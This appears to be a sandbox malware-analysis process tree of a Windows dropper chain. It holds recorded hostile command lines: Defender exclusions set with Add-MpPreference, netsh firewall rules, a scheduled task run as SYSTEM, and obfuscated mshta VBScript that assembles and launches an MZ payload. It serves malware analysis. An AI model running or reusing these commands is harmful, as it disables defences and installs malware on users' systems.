C:\Users\Admin\AppData\Local\Temp\2c-783b2-1ed-c38b4-42adcb09ce42c\SHofukaehidae.exe"C:\Users\Admin\AppData\Local\Temp\2c-783b2-1ed-c38b4-42adcb09ce42c\SHofukaehidae.exe"8⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e69⤵
- Adds Run key to start application
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0xe0,0x104,0x108,0xbc,0x10c,0x7fffea1146f8,0x7fffea114708,0x7fffea11471810⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2248,12107899457893473717,1287783604093493159,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2280 /prefetch:210⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2248,12107899457893473717,1287783604093493159,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2764 /prefetch:810⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2248,12107899457893473717,1287783604093493159,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2332 /prefetch:310⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2248,12107899457893473717,1287783604093493159,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3280 /prefetch:110⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2248,12107899457893473717,1287783604093493159,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3288 /prefetch:110⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2248,12107899457893473717,1287783604093493159,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4200 /prefetch:110⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2248,12107899457893473717,1287783604093493159,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5376 /prefetch:110⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2248,12107899457893473717,1287783604093493159,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3764 /prefetch:810⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2248,12107899457893473717,1287783604093493159,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3764 /prefetch:810⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\0a-811aa-7c5-f84a9-2a7e4fa205f58\Bejaepubowy.exe"C:\Users\Admin\AppData\Local\Temp\0a-811aa-7c5-f84a9-2a7e4fa205f58\Bejaepubowy.exe"8⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\yhwe4atx.yhy\GcleanerEU.exe /eufive & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\yhwe4atx.yhy\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\yhwe4atx.yhy\GcleanerEU.exe /eufive10⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4540 -s 23611⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\x141mmz3.e2s\installer.exe /qn CAMPAIGN="654" & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\x141mmz3.e2s\installer.exeC:\Users\Admin\AppData\Local\Temp\x141mmz3.e2s\installer.exe /qn CAMPAIGN="654"10⤵
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\x141mmz3.e2s\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\x141mmz3.e2s\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1636128743 /qn CAMPAIGN=""654"" " CAMPAIGN="654"11⤵
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2zdmtjad.vk2\any.exe & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\2zdmtjad.vk2\any.exeC:\Users\Admin\AppData\Local\Temp\2zdmtjad.vk2\any.exe10⤵
-
C:\Users\Admin\AppData\Local\Temp\2zdmtjad.vk2\any.exe"C:\Users\Admin\AppData\Local\Temp\2zdmtjad.vk2\any.exe" -u11⤵
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ipubpsxj.mmq\gcleaner.exe /mixfive & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\ipubpsxj.mmq\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\ipubpsxj.mmq\gcleaner.exe /mixfive10⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1348 -s 24011⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3kcbkf2b.psr\autosubplayer.exe /S & exit9⤵
-
-
-
C:\Program Files\Common Files\CRBPOKOHHG\foldershare.exe"C:\Program Files\Common Files\CRBPOKOHHG\foldershare.exe" /VERYSILENT8⤵
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\sMBp7A91ov12YzbkgRtpwODX.exe"C:\Users\Admin\Pictures\Adobe Films\sMBp7A91ov12YzbkgRtpwODX.exe"5⤵
-
C:\Users\Admin\Pictures\Adobe Films\sMBp7A91ov12YzbkgRtpwODX.exe"C:\Users\Admin\Pictures\Adobe Films\sMBp7A91ov12YzbkgRtpwODX.exe" -u6⤵
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\4sJVMRoh2XvFYLOlja0nQegx.exe"C:\Users\Admin\Pictures\Adobe Films\4sJVMRoh2XvFYLOlja0nQegx.exe"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\Pictures\Adobe Films\8uwyDq4RzIASixTAPZYZJmwI.exe"C:\Users\Admin\Pictures\Adobe Films\8uwyDq4RzIASixTAPZYZJmwI.exe"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\Pictures\Adobe Films\ystYIyf3LAEozet_mkeMbreD.exe"C:\Users\Admin\Pictures\Adobe Films\ystYIyf3LAEozet_mkeMbreD.exe"3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Pictures\Adobe Films\S3hVyTpSyStATNGo3TrVZ9ki.exe"C:\Users\Admin\Pictures\Adobe Films\S3hVyTpSyStATNGo3TrVZ9ki.exe"3⤵
- Executes dropped EXE
- Drops file in Windows directory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\4⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \4⤵
-
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes4⤵
-
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes4⤵
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /create /sc minute /ED "11/02/2024" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Creates scheduled task(s)
-
-
C:\Windows\System\svchost.exe"C:\Windows\System\svchost.exe" formal4⤵
- Executes dropped EXE
- Drops file in Windows directory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\5⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \5⤵
-
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes5⤵
-
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes5⤵
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\ZDrO50KpNCLpsUulmLanzxOV.exe"C:\Users\Admin\Pictures\Adobe Films\ZDrO50KpNCLpsUulmLanzxOV.exe"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\Pictures\Adobe Films\boEXMtSc0H_EpwU9srBh1ctk.exe"C:\Users\Admin\Pictures\Adobe Films\boEXMtSc0H_EpwU9srBh1ctk.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\2873589.exe"C:\Users\Admin\AppData\Local\2873589.exe"5⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\6404539.exe"C:\Users\Admin\AppData\Local\6404539.exe"5⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\AppData\Local\2758866.exe"C:\Users\Admin\AppData\Local\2758866.exe"5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscRIpt: cLosE ( CreateOBjEct ( "WsCrIpT.shelL" ). Run ( "cMD /q /c cOPy /Y ""C:\Users\Admin\AppData\Local\2758866.exe"" ..\RxAPuFNW.exe && sTaRT ..\rxAPuFNw.EXe -P1jBMdKQQ16j1dp4oT~i & IF """" == """" for %Z iN ( ""C:\Users\Admin\AppData\Local\2758866.exe"" ) do taskkill -f -Im ""%~NXZ"" ", 0, TRUE ) )6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /c cOPy /Y "C:\Users\Admin\AppData\Local\2758866.exe" ..\RxAPuFNW.exe && sTaRT ..\rxAPuFNw.EXe -P1jBMdKQQ16j1dp4oT~i &IF "" == "" for %Z iN ( "C:\Users\Admin\AppData\Local\2758866.exe" ) do taskkill -f -Im "%~NXZ"7⤵
-
C:\Users\Admin\AppData\Local\Temp\RxAPuFNW.exe..\rxAPuFNw.EXe -P1jBMdKQQ16j1dp4oT~i8⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscRIpt: cLosE ( CreateOBjEct ( "WsCrIpT.shelL" ). Run ( "cMD /q /c cOPy /Y ""C:\Users\Admin\AppData\Local\Temp\RxAPuFNW.exe"" ..\RxAPuFNW.exe && sTaRT ..\rxAPuFNw.EXe -P1jBMdKQQ16j1dp4oT~i & IF ""-P1jBMdKQQ16j1dp4oT~i "" == """" for %Z iN ( ""C:\Users\Admin\AppData\Local\Temp\RxAPuFNW.exe"" ) do taskkill -f -Im ""%~NXZ"" ", 0, TRUE ) )9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /c cOPy /Y "C:\Users\Admin\AppData\Local\Temp\RxAPuFNW.exe" ..\RxAPuFNW.exe && sTaRT ..\rxAPuFNw.EXe -P1jBMdKQQ16j1dp4oT~i &IF "-P1jBMdKQQ16j1dp4oT~i " == "" for %Z iN ( "C:\Users\Admin\AppData\Local\Temp\RxAPuFNW.exe" ) do taskkill -f -Im "%~NXZ"10⤵
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBSCRipT: CLOse ( createoBJECt ( "wScRIpt.shelL" ). RUn ("cMd /C EChO | SEt /p = ""MZ"" > CPkPI.i & CopY /b /Y CPkpI.I + sQCC.RrX + NvzjY~Q7.S1K+ FZOB0ELr.D +wXR7c.DF ..\WfNrfms4.K & StARt control ..\WfNRfms4.K & Del /Q * " , 0 ,tRue ) )9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C EChO | SEt /p = "MZ" > CPkPI.i & CopY /b /Y CPkpI.I + sQCC.RrX + NvzjY~Q7.S1K+ FZOB0ELr.D +wXR7c.DF ..\WfNrfms4.K & StARt control ..\WfNRfms4.K & Del /Q *10⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EChO "11⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SEt /p = "MZ" 1>CPkPI.i"11⤵
-
-
C:\Windows\SysWOW64\control.execontrol ..\WfNRfms4.K11⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL ..\WfNRfms4.K12⤵
- Loads dropped DLL
-
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL ..\WfNRfms4.K13⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 ..\WfNRfms4.K14⤵
- Loads dropped DLL
-
-
-
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -Im "2758866.exe"8⤵
- Kills process with taskkill
-
-
-
-
-
C:\Users\Admin\AppData\Local\2611849.exe"C:\Users\Admin\AppData\Local\2611849.exe"5⤵
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"6⤵
-
-
-
C:\Users\Admin\AppData\Local\6161720.exe"C:\Users\Admin\AppData\Local\6161720.exe"5⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\WW1Soft.exe"C:\Users\Admin\AppData\Local\Temp\WW1Soft.exe"4⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5884 -s 3005⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If """" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "" == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ) do taskkill -f -iM "%~NxM"6⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "search_hyperfs_206.exe"7⤵
- Kills process with taskkill
-
-
C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )8⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "/PLQtzfgO0m8dRv4iYALOqi " == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"9⤵
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpt: CLosE ( cReAteobjEcT ( "wscRiPt.SheLl" ). RUn ( "C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE ) )8⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC9⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHo "10⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"10⤵
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec -Y ..\lXQ2g.WC10⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Loads dropped DLL
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\liuchang-game.exe"C:\Users\Admin\AppData\Local\Temp\liuchang-game.exe"4⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-TT15C.tmp\setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-TT15C.tmp\setup.tmp" /SL5="$2032A,1570064,56832,C:\Users\Admin\AppData\Local\Temp\setup.exe"5⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\askinstall25.exe"C:\Users\Admin\AppData\Local\Temp\askinstall25.exe"4⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\inst1.exe"C:\Users\Admin\AppData\Local\Temp\inst1.exe"4⤵
-
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe"4⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6616 -s 2365⤵
- Program crash
-
-
-
C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
-
-
C:\Users\Admin\AppData\Local\Temp\chrome1.exe"C:\Users\Admin\AppData\Local\Temp\chrome1.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"5⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5440 -s 10126⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\chrome update.exe"C:\Users\Admin\AppData\Local\Temp\chrome update.exe"4⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\chrome2.exe"C:\Users\Admin\AppData\Local\Temp\chrome2.exe"4⤵
- Executes dropped EXE
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4080 -s 17045⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\o6zEWa0CtF1KjvBgbb_Tn4_k.exe"C:\Users\Admin\Pictures\Adobe Films\o6zEWa0CtF1KjvBgbb_Tn4_k.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5028 -s 19324⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\Pictures\Adobe Films\e8sIHJtYYbh6Npgujz9tWguG.exe"C:\Users\Admin\Pictures\Adobe Films\e8sIHJtYYbh6Npgujz9tWguG.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Pictures\Adobe Films\e8sIHJtYYbh6Npgujz9tWguG.exe"C:\Users\Admin\Pictures\Adobe Films\e8sIHJtYYbh6Npgujz9tWguG.exe"4⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
-
-
C:\Users\Admin\Pictures\Adobe Films\h7kHvYoMhO87j6fFaG42C6p1.exe"C:\Users\Admin\Pictures\Adobe Films\h7kHvYoMhO87j6fFaG42C6p1.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4616 -s 2964⤵
- Program crash
-
-
-
C:\Users\Admin\Pictures\Adobe Films\VTxBU9kvc_11oiNVNgZO3Swz.exe"C:\Users\Admin\Pictures\Adobe Films\VTxBU9kvc_11oiNVNgZO3Swz.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\Pictures\Adobe Films\Q1Iw7NGBXjDO5OMkHG1HYDNH.exe"C:\Users\Admin\Pictures\Adobe Films\Q1Iw7NGBXjDO5OMkHG1HYDNH.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\MegogoSell_crypted.exeC:\Users\Admin\AppData\Roaming\MegogoSell_crypted.exe4⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"5⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Underdress.exeC:\Users\Admin\AppData\Roaming\Underdress.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\Unseduceability.exe"C:\Users\Admin\AppData\Local\Temp\Unseduceability.exe"5⤵
- Executes dropped EXE
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\IKNZNRMAqUQWUjeHDyftTpOA.exe"C:\Users\Admin\Pictures\Adobe Films\IKNZNRMAqUQWUjeHDyftTpOA.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2644 -s 7644⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global4⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3620 -s 4485⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\ht0nMTNFQ1tFe4ykfsVcsyoI.exe"C:\Users\Admin\Pictures\Adobe Films\ht0nMTNFQ1tFe4ykfsVcsyoI.exe"3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Pictures\Adobe Films\79EHDGPMMWEeapPnka1VRJAH.exe"C:\Users\Admin\Pictures\Adobe Films\79EHDGPMMWEeapPnka1VRJAH.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4820 -s 2764⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\Pictures\Adobe Films\cKNfesBMIdF8xbjJgapm5LeE.exe"C:\Users\Admin\Pictures\Adobe Films\cKNfesBMIdF8xbjJgapm5LeE.exe"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\Pictures\Adobe Films\BjEs7BqmOorrI7PZG6BFwx9e.exe"C:\Users\Admin\Pictures\Adobe Films\BjEs7BqmOorrI7PZG6BFwx9e.exe"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\Pictures\Adobe Films\N4phlRmSOn13aOF7LX6J0osn.exe"C:\Users\Admin\Pictures\Adobe Films\N4phlRmSOn13aOF7LX6J0osn.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3480 -s 3364⤵
- Program crash
-
-
-
